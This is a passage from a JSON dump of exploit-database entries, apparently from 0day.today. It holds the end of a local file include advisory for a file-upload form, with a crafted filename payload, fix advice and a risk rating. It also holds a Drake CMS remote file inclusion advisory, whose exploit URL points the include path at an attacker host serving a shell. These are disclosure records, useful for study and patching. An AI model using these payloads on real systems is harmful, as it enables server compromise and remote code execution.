Accept-Language[de,en-US;q=0.7,en;q=0.3]\r\n Accept-Encoding[gzip, deflate]\r\n 
Referer[http://localhost:49276/]\r\n Connection[keep-alive]\r\n POST-Daten:\r\n POST_DATA[-----------------------------28140821932238\r\nContent-Disposition: form-data; name=\"file\"; filename=\"%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png\"\r\nContent-Type: image/png\r\n\r\n\r\nReference(s):\r\nhttp://localhost:49276/\r\nhttp://localhost:49276//%3C./\r\n\r\n\r\nSolution - Fix & Patch:\r\n=======================\r\nThe vulnerability can be patched by a secure validation of the filename value in the upload POST method request. Restrict the filename input and \r\ndisallow special chars. Ensure that multiple file extensions are not accepted in the filename value, to prevent arbitrary file upload attacks.\r\nEncode the output in the file dir index list with the vulnerable name value to prevent application-side injection attacks.\r\n\r\n\r\nSecurity Risk:\r\n==============\r\nThe security risk of the local file include web vulnerability in the upload POST method request is estimated as high. 
(CVSS 6.3)\n\n# 0day.today [2018-04-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/23556"}, {"lastseen": "2018-01-04T03:06:50", "references": [], "description": "Exploit for unknown platform in category web applications", "edition": 2, "reporter": "GregStar", "published": "2006-11-04T00:00:00", "title": "Drake CMS < 0.2.3 ALPHA rev.916 Remote File Inclusion Vulnerability", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-04T03:06:50", "vector": "AV:N/AC:M/Au:M/C:P/I:P/A:P/", "value": 5.4}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2006-11-04T00:00:00", "id": "1337DAY-ID-1112", "href": "https://0day.today/exploit/description/1112", "sourceData": "===================================================================\r\nDrake CMS < 0.2.3 ALPHA rev.916 Remote File Inclusion Vulnerability\r\n===================================================================\r\n\r\n\r\n\r\n**********************************************************************************************************\r\n \r\n\t\t\t Coding 4 Fun (c4f.pl) \r\n\t\t\t \r\n**********************************************************************************************************\r\n\r\n* Drake CMS v0.2.2 ALPHA rev.846 (http://drakecms.org) ; \r\n\r\n* Class = Remote File Inclusion ;\r\n\r\n* Found by = GregStar (gregstar[at]c4f[dot]pl) ;\r\n\r\n-------------------------------------------------------------------------------------------------------------------\r\n\r\n\r\n- Vulnerable Code in \"includes/xhtml.php\" :\r\n\r\n \tinclude $d_root.'classes/kses.php';\r\n\r\n++++++++++++++++++++++++++++++++++++++++++++\r\n\r\n- Exploit:\r\n\r\n\thttp://[target]/[path]/includes/xhtml.php?d_root=http://evilsite.com/shell?\r\n\r\n\r\n------------------------------------------------------------------------------------------------------------------\r\n\r\nGr33tz: 
sASAn,marcel3miasto,masS,kaziq,Abi,kociaq,SlashBeast,chochlik,RFL,d3m0n,java,reyw,[email\u00a0protected] and for all friends.\r\n\r\n**************************************************************************************************************\r\n\r\n\r\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/1112"}]}}